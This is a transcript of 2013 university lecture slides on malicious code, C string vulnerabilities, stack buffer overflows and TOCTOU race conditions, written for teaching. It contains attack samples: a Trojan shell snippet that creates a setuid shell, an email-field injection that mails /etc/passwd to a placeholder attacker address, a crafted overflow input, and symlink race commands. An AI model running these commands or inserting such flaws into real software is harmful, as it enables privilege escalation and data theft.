IS 2150 / TEL 2810 Information Security & Privacy

Slides:



Advertisements
Similar presentations
Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Advertisements

R4 Dynamically loading processes. Overview R4 is closely related to R3, much of what you have written for R3 applies to R4 In R3, we executed procedures.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Chapter 3 (Part 1) Network Security
CS526: Information Security Chris Clifton November 25, 2003 Malicious Code.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
________________ CS3235, Nov 2002 Viruses Adapted from Pfleeger[Chap 5]. A virus is a program [fragment] that can pass on malicious code [usually itself]
1 Pertemuan 05 Malicious Software Matakuliah: H0242 / Keamanan Jaringan Tahun: 2006 Versi: 1.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
1 Malicious Logic CSSE 490 Computer Security Mark Ardis, Rose-Hulman Institute March 25, 2004.
CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.
Video Following is a video of what can happen if you don’t update your security settings! security.
Java Security. Topics Intro to the Java Sandbox Language Level Security Run Time Security Evolution of Security Sandbox Models The Security Manager.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Dr. José M. Reyes Álamo 1.  The 80x86 memory addressing modes provide flexible access to memory, allowing you to easily access ◦ Variables ◦ Arrays ◦
Chapter 6 Buffer Overflow. Buffer Overflow occurs when the program overwrites data outside the bounds of allocated memory It was one of the first exploited.
More Network Security Threats Worm = a stand-alone program that can replicate itself and spread Worms can also contain manipulation routines to perform.
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12 Nov 20, 2012 Malicious Code Vulnerability related to String,
1 Higher Computing Topic 8: Supporting Software Updated
1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.
Mitigation of Buffer Overflow Attacks
Secure Coding in C and C++ String Vulnerabilities Lecture 4 Jan 25, 2011 Acknowledgement: These slides are based on author Seacord’s original presentation.
CPS4200 Unix Systems Programming Chapter 2. Programs, Processes and Threads A program is a prepared sequence of instructions to accomplish a defined task.
Malicious Logic and Defenses. Malicious Logic Trojan Horse – A Trojan horse is a program with an overt (documented or known) effect and covert (undocumented.
Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
JMU GenCyber Boot Camp Summer, Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations.
Application Vulnerabilities and Attacks COEN 351.
Buffer overflow and stack smashing attacks Principles of application software security.
14.1 Silberschatz, Galvin and Gagne ©2009 Operating System Concepts with Java – 8 th Edition Protection.
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
1988 Morris Worm … estimated 10% penetration 2001 Code Red … 300,00 computers breached 2003 Slammer/Sapphire … 75,00 infections in 10 min Zotob …
1988 Morris Worm … estimated 10% penetration 2001 Code Red … 300,00 computers breached 2003 Slammer/Sapphire … 75,00 infections in 10 min Zotob …
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 11 Dec 8, 2009 Vulnerability related Integers. String, Race.
Computer Viruses Author: Alyse Allen.
Let’s look at an example
Mitigation against Buffer Overflow Attacks
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
Storage Classes There are three places in memory where data may be placed: In Data section declared with .data in assembly language in C - Static) On the.
Introduction to Operating Systems
CMSC 345 Defensive Programming Practices from Software Engineering 6th Edition by Ian Sommerville.
Protecting Memory What is there to protect in memory?
The Hardware/Software Interface CSE351 Winter 2013
Protecting Memory What is there to protect in memory?
Protecting Memory What is there to protect in memory?
IS 2150 / TEL 2810 Introduction to Security
CMSC 414 Computer and Network Security Lecture 21
Chapter 9 :: Subroutines and Control Abstraction
Text Book: Security in Computing
Introduction to Operating Systems
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Chap 10 Malicious Software.
UNIT 18 Data Security 1.
IS 2150 / TEL 2810 Introduction to Security
CSE 451: Operating Systems Spring 2012 Module 6 Review of Processes, Kernel Threads, User-Level Threads Ed Lazowska 570 Allen.
Process Description and Control
Chapter 22: Malicious Logic
System Calls David Ferry CSCI 3500 – Operating Systems
Chapter 2: Operating-System Structures
Introduction to Operating Systems
Chap 10 Malicious Software.
CS5123 Software Validation and Quality Assurance
Malicious Program and Protection
Chapter 2: Operating-System Structures
IS 2150 / TEL 2810 Introduction to Security
Return-to-libc Attacks
Presentation transcript:

IS 2150 / TEL 2810 Information Security & Privacy James Joshi Associate Professor, SIS Lecture 9 March 27, 2013 Malicious Code Vulnerability related to String, Race Conditions

Objectives Understand/explain issues related to malicious code and programming related vulnerabilities and buffer overflow String related Race Conditions

Malicious Code

What is Malicious Code? Set of instructions that causes a security policy to be violated unintentional mistake Tricked into doing that? “unwanted” code Generally relies on “legal” operations Authorized user could perform operations without violating policy Malicious code “mimics” authorized user

Types of Malicious Code Trojan Horse What is it? Virus Worm

Trojan Horse Program with an overt (expected) and covert (unexpected) effect Appears normal/expected Covert effect violates security policy User tricked into executing Trojan horse Expects (and sees) overt behavior Covert effect performed with user’s authorization Trojan horse may replicate Create copy on execution Spread to other users/systems

Example cat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh Perpetrator cat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* eof Victim ls What happens? How to replicate this?

Virus Self-replicating code Operates when infected code executed A freely propagating Trojan horse some disagree that it is a Trojan horse Inserts itself into another file Alters normal code with “infected” version Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program

Virus Types Boot Sector Infectors (The Brain Virus) Problem: How to ensure virus “carrier” executed? Solution: Place in boot sector of disk Run on any boot Propagate by altering boot disk creation Executable infector The Jerusalem Virus, Friday 13th, not 1987 Multipartite virus : boot sector + executable infector

Virus Types/Properties Terminate and Stay Resident Stays active in memory after application complete Allows infection of previously unknown files Stealth (an executable infector) Conceal Infection Encrypted virus Prevents “signature” to detect virus [Deciphering routine, Enciphered virus code, Deciphering Key] Polymorphism Change virus code to something equivalent each time it propagates

Virus Types/Properties Macro Virus Composed of a sequence of instructions that is interpreted rather than executed directly Infected “executable” isn’t machine code Relies on something “executed” inside application Example: Melissa virus infected Word 97/98 docs Otherwise similar properties to other viruses Architecture-independent Application-dependent

Worms Replicates from one computer to another Self-replicating: No user action required Virus: User performs “normal” action Trojan horse: User tricked into performing action Communicates/spreads using standard protocols

Other forms of malicious logic We’ve discussed how they propagate But what do they do? Rabbits/Bacteria Exhaust system resources of some class Denial of service; e.g., While (1) {mkdir x; chdir x} Logic Bomb Triggers on external event Date, action Performs system-damaging action Often related to event Others?

We can’t detect it: Now what? Detection Signature-based antivirus Look for known patterns in malicious code Great business model! Checksum (file integrity, e.g. Tripwire) Maintain record of “good” version of file Validate action against specification Including intermediate results/actions N-version programming: independent programs A fault-tolerance approach (diversity)

Detection Proof-carrying code Statistical Methods Code includes proof of correctness At execution, verify proof against code If code modified, proof will fail Statistical Methods High/low number of files read/written Unusual amount of data transferred Abnormal usage of CPU time

Defense Clear distinction between data and executable Virus must write to program Write only allowed to data Must execute to spread/act Data not allowed to execute Auditable action required to change data to executable

Defense Information Flow Control Least Privilege Limits spread of virus Problem: Tracking information flow Least Privilege Programs run with minimal needed privilege

Defense Sandbox / Virtual Machine Use Multi-Level Security Mechanisms Run in protected area Libraries / system calls replaced with limited privilege set Use Multi-Level Security Mechanisms Place programs at lowest level Don’t allow users to operate at that level Prevents writes by malicious code

String Vulnerabilities

C-Style Strings Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++. C-style strings consist of a contiguous sequence of characters terminated by and including the first null character. A pointer to a string points to its initial character. String length is the number of bytes preceding the null character The string value is the sequence of the values of the contained characters, in order. The number of bytes required to store a string is the number of characters plus one (x the size of each character) h e l o \0 length

Common String Manipulation Errors Common errors include Unbounded string copies Null-termination errors Truncation Write outside array bounds Off-by-one errors Improper data sanitization

Unbounded String Copies Occur when data is copied from an unbounded source to a fixed length character array 1. int main(void) { 2.   char Password[80]; 3.   puts("Enter 8 character password:"); 4.   gets(Password);           ... 5. } This program reads characters from standard input into a fixed length character array until a newline character is read or an end-of-file (EOF) condition is encountered. Because it is not always possible to know beforehand how many characters a user will supply, it is not possible to statically allocate an array of sufficient length A common solution is to statically allocate an array that is much larger than needed The programmer is only expecting the user to enter eight characters so it is reasonable to assume that the 80 character length will not be exceeded. When dealing with malicious users this fixed length character array can be easily exceeded 1. #include <iostream.h> 2. int main(void) { 3.  char buf[12]; 4.  cin >> buf; 5.  cout<<"echo: "<<buf<<endl; 6. }

Simple Solution Test the length of the input using strlen() and dynamically allocate the memory 1. int main(int argc, char *argv[]) {  2.   char *buff = (char *)malloc(strlen(argv[1])+1);  3.   if (buff != NULL) {  4.     strcpy(buff, argv[1]);  5.     printf("argv[1] = %s.\n", buff);  6.   }  7.   else {   /* Couldn't get the memory - recover */  8.   }  9.   return 0; 10. }

Null-Termination Errors Another common problem with C-style strings is a failure to properly null terminate int main(int argc, char* argv[]) { char a[16]; char b[16]; char c[32]; strcpy(a, "0123456789abcdef”); strcpy(b, "0123456789abcdef"); strcpy(c, a); } Neither a[] nor b[] are properly terminated

String Truncation Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilities Example: strncpy() instead of strcpy() Strings that exceed the specified limits are truncated Truncation results in a loss of data, and in some cases, to software vulnerabilities

Improper Data Sanitization An application inputs an email address from a user and writes the address to a buffer [Viega 03] sprintf(buffer, "/bin/mail %s < /tmp/email", addr ); The buffer is then executed using the system() call. The risk is, of course, that the user enters the following string as an email address: bogus@addr.com; cat /etc/passwd | mail some@badguy.net [Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.

What is a Buffer Overflow? A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure Destination Memory Source Allocated Memory (12 Bytes) Other Memory 16 Bytes of Data Copy Operation

Buffer Overflows Caused when buffer boundaries are neglected and unchecked Buffer overflows can be exploited to modify a variable data pointer function pointer return address on the stack

Smashing the Stack This is an important class of vulnerability because of their frequency and potential consequences. Occurs when a buffer overflow overwrites data in the memory allocated to the execution stack. Successful exploits can overwrite the return address on the stack allowing execution of arbitrary code on the targeted machine.

Program Stacks A program stack is used to keep track of program execution and state by storing return address in the calling function arguments to the functions local variables (temporary) The stack is modified during function calls function initialization when returning from a subroutine Code Data Heap Stack

Stack Segment b() {…} a() { b(); } main() { a(); Low memory The stack supports nested invocation calls Information pushed on the stack as a result of a function call is called a frame Low memory Unallocated Stack frame for b() b() {…} a() { b(); } main() { a(); A stack frame is created for each subroutine and destroyed upon return Stack frame for a() Stack frame for main() High memory

Stack Frames The stack is used to store return address in the calling function actual arguments to the subroutine local (automatic) variables The address of the current frame is stored in a register (EBP on Intel architectures) The frame pointer is used as a fixed point of reference within the stack

Subroutine Calls function(4, 2); push 2 push 4 call function (411A29h) Push 2nd arg on stack function(4, 2); push 4 Push 1st arg on stack call function (411A29h) Push the return address on stack and jump to address

Subroutine Initialization void function(int arg1, int arg2) { push ebp Save the frame pointer mov ebp, esp Frame pointer for subroutine is set to current stack pointer The push instruction on line [1] pushes the EBP register containing the pointer to the current stack frame onto the stack. The move instruction on line [2] sets the frame pointer for the subroutine (the EBP register) to the current stack pointer. Following these two instructions the subroutine allocates and initializes space on the stack for the local variables sub esp, 44h Allocates space for local variables

Subroutine Return return(); mov esp, ebp pop ebp ret Restore the stack pointer return(); pop ebp Restore the frame pointer The stack pointer (ESP) is restored from the frame pointer (EBP). The original EBP upon invocation is then popped from the stack. The RET instruction pops a return address off the stack and transfers control to that location. ret Pops return address off the stack and transfers control to that location

Return to Calling Function push 2 push 4 call function (411230h) add esp,8 Restore stack pointer

Example Program bool IsPasswordOK(void) { char Password[12]; // Memory storage for pwd gets(Password); // Get input from keyboard if (!strcmp(Password,"goodpass")) return(true); // Password Good else return(false); // Password Invalid } void main(void) { bool PwStatus; // Password Status puts("Enter Password:"); // Print PwStatus=IsPasswordOK(); // Get & Check Password if (PwStatus == false) { puts("Access denied"); // Print exit(-1); // Terminate Program else puts("Access granted");// Print

Stack Before Call to IsPasswordOK() Code EIP puts("Enter Password:"); PwStatus=IsPasswordOK(); if (PwStatus==false) { puts("Access denied"); exit(-1); } else puts("Access granted"); Stack ESP Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) …

Stack During IsPasswordOK() Call Code Stack ESP Storage for Password (12 Bytes) Caller EBP – Frame Ptr main (4 bytes) Return Addr Caller – main (4 Bytes) Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … EIP puts("Enter Password:"); PwStatus=IsPasswordOK(); if (PwStatus==false) { puts("Access denied"); exit(-1); } else puts("Access granted"); bool IsPasswordOK(void) { char Password[12]; gets(Password); if (!strcmp(Password, "goodpass")) return(true); else return(false) } Note: The stack grows and shrinks as a result of function calls made by IsPasswordOK(void)

Stack After IsPasswordOK() Call puts("Enter Password:"); PwStatus = IsPasswordOk(); if (PwStatus == false) { puts("Access denied"); exit(-1); } else puts("Access granted"); Code EIP Storage for Password (12 Bytes) Caller EBP – Frame Ptr main (4 bytes) Return Addr Caller – main (4 Bytes) Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … Stack ESP

The Buffer Overflow 1 * CRASH * What happens if we input a password with more than 11 characters ? * CRASH *

The Buffer Overflow 2 Stack Storage for Password (12 Bytes) “123456789012” Caller EBP – Frame Ptr main (4 bytes) “3456” Return Addr Caller – main (4 Bytes) “7890” Storage for PwStatus (4 bytes) “\0” Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … bool IsPasswordOK(void) { char Password[12]; gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false) } ESP EIP The return address and other data on the stack is over written because the memory space allocated for the password can only hold a maximum 11 character plus the NULL terminator.

The Vulnerability A specially crafted string “1234567890123456j►*!” produced the following result. What happened ?

What Happened ? “1234567890123456j►*!” overwrites 9 bytes of memory on the stack changing the callers return address skipping lines 3-5 and starting execuition at line 6 Stack Storage for Password (12 Bytes) “123456789012” Caller EBP – Frame Ptr main (4 bytes) “3456” Return Addr Caller – main (4 Bytes) “j►*!” (return to line 7 was line 3) Storage for PwStatus (4 bytes) “\0” Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) Statement 1 puts("Enter Password:"); 2 PwStatus=ISPasswordOK(); 3 if (PwStatus == true) 4 puts("Access denied"); 5 exit(-1); 6 } 7 else puts("Access granted"); Note: This vulnerability also could have been exploited to execute arbitrary code contained in the input string.

Race conditions

Concurrency and Race condition Execution of Multiple flows (threads, processes, tasks, etc) If not controlled can lead to nondeterministic behavior Race conditions Software defect/vulnerability resulting from unanticipated execution ordering of concurrent flows E.g., two people simultaneously try to modify the same account (withrawing money)

Race condition Necessary properties for a race condition Concurrency property At least two control flows executing concurrently Shared object property The concurrent flows must access a common shared race object Change state property Atleast one control flow must alter the state of the race object

Race window A code segment that accesses the race object in a way that opens a window of opportunity for race condition Sometimes referred to as critical section Traditional approach Ensure race windows do not overlap Make them mutually exclusive Language facilities – synchronization primitives (SP) Deadlock is a risk related to SP Denial of service

Time of Check, Time of Use Source of race conditions Trusted (tightly coupled threads of execution) or untrusted control flows (separate application or process) ToCTToU race conditions Can occur during file I/O Forms a RW by first checking some race object and then using it

Example Assume the program is running with an effective UID of root int main(int argc, char *argv[]) { FILE *fd; if (access(“/some_file”, W_OK) == 0) { printf("access granted.\n"); fd = fopen(“/some_file”, "wb+"); /* write to the file */ fclose(fd); } else { err(1, "ERROR"); } return 0; } Figure 7-1 Assume the program is running with an effective UID of root

TOCTOU Following shell commands during RW Mitigation rm /some_file ln /myfile /some_file Mitigation Replace access() call by code that does the following Drops the privilege to the real UID Open with fopen() & Check to ensure that the file was opened successfully